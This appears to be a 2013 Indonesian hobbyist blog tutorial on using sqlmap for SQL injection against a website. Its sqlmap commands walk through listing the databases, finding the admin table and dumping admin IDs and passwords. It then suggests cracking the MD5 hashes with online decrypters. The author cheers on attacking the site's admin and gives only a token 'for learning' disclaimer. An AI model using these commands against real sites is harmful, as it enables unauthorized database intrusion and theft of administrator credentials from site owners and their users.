Monday 17 June 2013

Tutorial Scan Vuln SQLI dengan Sqlmap

Saya Akan memberi tutor tentang Sqlmap

pertama siapkan bahanya
-python
-sqlmap

kalo mau download python sama sqlmapnya bsa di sini 

Dowload Python , Download Sqlmap

kalo bahanya sudah lengkap skrg bukak CMD (Comannd Prompt)

kalo saya naruh sqlmapnya di desktop biar gmpng

oke pertama tulis di cmd "cd desktop"

kedua klo sudah msk ke desktop tulis "cd sqlmap"

nah udh msh itu di sqlmap tinggal tulisa "sqlmap.py -u www.site.com/php?=12 --dbs

Contoh :







ke empat nah kalo sudah ntar nyecan sendiri trus
ntar kan kluar kyk databasenya contoh kyk
online_utsis
itu cuman contohnya y :D

ke empat cara bukak databasenya gni
sqlmap.py -u www.site.com/php?=12 -D online_utsis --tables

nah ntar kluar kyk tabels2 bnyk kan :D
nah di sini kita mencari tables usernya
contoh tabel usernya namanya:
user_admin

nah ini tinggal kalian bukak aja tabelnya dengan command
sqlmap.py -u www.site.com/php?=12 -D online_utsis -T user_admin --columns

udh ntar nyecan
wahahahah ini saatnya senang2 udh kluar tuh adminya ahahaha serang adminya sekarang wkwkwk
kluar kan tables admin kyk ada pilihanya

admin_id
Admin_password
phone
adrees

nah ini tinggal di pilih mau bukak apa aja misalnya bukak admin id sma admin password y :D tinggal ketik
sqlmap,py -u www.site.com/php?=12 -D online_utsis -T user_admin -C admin_id,Admin_password --dump

nah udh deh ktmu adminya :P misalnya passwordnya di lindugi sma md5 dkk
cobak scan di google bnyk kok md5 decrypter

Notes:ini hanya tutorial untuk beljar sisnya resiko buat anda2 sndri :D bukan salah saya :P

yah sekian dari saya trimakasih maaf jik ada kata2 yg g enk di hti para agan2


kalo msih blom pahan bisa komen di bawah insyallah saya akan menjelaskanya lebih detail lagi

Regard : BF ( Blue Frozen )